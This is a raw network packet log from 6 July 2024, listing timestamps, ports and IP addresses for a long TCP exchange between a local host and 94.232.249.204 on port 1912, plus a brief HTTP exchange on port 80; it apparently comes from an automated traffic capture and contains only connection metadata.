Jul 6, 2024 13:27:54.261079073 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261087894 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261096001 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261240959 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261250019 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261379004 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261389017 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261396885 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261400938 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261410952 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261428118 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261436939 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261445045 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261454105 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261464119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261564016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261574984 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261583090 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261591911 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261611938 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261626005 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261636972 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261646032 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261719942 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261729956 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261749029 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261759043 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261775017 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261784077 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261825085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261835098 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261898994 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261908054 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261918068 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261928082 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261985064 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.261995077 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262036085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262046099 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262063980 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262073040 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262109995 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262120008 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262195110 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262204885 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262212992 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262222052 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262320042 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262329102 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262337923 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262346983 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262365103 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262372971 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262654066 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.262882948 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.262948990 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.265937090 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.265947104 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266005993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266016006 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266033888 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266041994 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266098976 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266108990 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266119957 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266163111 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266211033 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266221046 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266278028 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266288042 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266339064 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266347885 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266397953 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266407967 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266472101 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266545057 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266554117 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266562939 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266607046 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266617060 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266671896 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266683102 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.266690969 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267393112 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267402887 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267410040 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267419100 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267427921 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267445087 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267455101 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267462015 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267476082 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267486095 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267503977 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267513990 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267637014 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267647028 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267684937 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267698050 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267728090 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267738104 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267755032 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267764091 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267781019 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267788887 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267874002 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267884016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267965078 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.267975092 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268014908 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268024921 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268064022 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268109083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268121004 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268172026 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268261909 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268273115 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268290043 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268299103 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268357992 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268367052 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268452883 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.268518925 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.268520117 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268538952 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268615007 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268624067 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268635035 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268644094 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268661022 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268671036 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268721104 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268731117 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268745899 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268815994 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268826008 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268834114 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268857956 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268867016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268914938 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268924952 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.268965960 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269023895 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269033909 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269037962 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269071102 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269079924 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269155979 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269165993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269208908 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269217968 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269268036 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269277096 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269365072 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269372940 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269454002 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269463062 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269500017 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269567966 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269577980 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269587994 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269609928 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269618988 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.269625902 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.272614002 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.272811890 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.272872925 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.273607969 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273617983 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273664951 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273674011 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273718119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273730993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273796082 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273806095 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273866892 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273875952 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273891926 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273911953 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273960114 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.273969889 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274019957 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274029970 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274106979 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274116039 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274168968 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274178982 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274221897 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274230957 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274281025 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274290085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274341106 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274349928 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274404049 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274413109 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274446011 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274488926 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274497986 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274508953 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274565935 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274575949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274627924 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274637938 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274676085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274686098 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274734974 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274744987 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274765015 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274782896 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274840117 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274900913 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274909973 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274921894 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274940014 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.274950981 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275043011 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275053024 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275155067 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275171995 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275212049 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275260925 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.275434971 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.275504112 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.277865887 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.277875900 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.277920008 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.277935982 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.277985096 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.277997971 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278042078 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278050900 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278107882 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278116941 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278127909 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278136969 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278207064 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278214931 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278244019 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278283119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278342962 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278352976 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278404951 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278414965 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278464079 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278474092 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.278480053 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280679941 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280689955 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280700922 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280710936 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280720949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280729055 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280738115 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280746937 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280755997 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280764103 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280772924 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280781984 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280791044 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280801058 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280810118 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280817032 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280827045 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280834913 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280846119 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280854940 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280863047 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280873060 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280889034 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280899048 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280906916 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280916929 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280925035 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280934095 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280942917 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280951977 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.280960083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.281061888 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.282464981 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282871008 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282880068 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282888889 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282897949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282917023 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282927036 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.282937050 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283041000 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283050060 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283102989 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283113003 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283152103 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.283162117 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284034014 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284044981 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284054041 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284063101 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284071922 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284080029 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284089088 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284096956 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284106016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284115076 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284123898 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284132957 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284142017 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284151077 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284159899 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284168959 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284177065 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284185886 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284194946 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.284204006 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.298108101 CEST	49805	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.303062916 CEST	80	49805	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:54.303124905 CEST	49805	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.303209066 CEST	49805	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.308689117 CEST	80	49805	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:54.308731079 CEST	49805	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:54.316088915 CEST	80	49805	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:54.325285912 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.954885006 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:54.959711075 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:54.964543104 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.139020920 CEST	80	49805	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:55.139569044 CEST	80	49805	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:55.139719963 CEST	49805	80	192.168.2.4	188.114.96.3
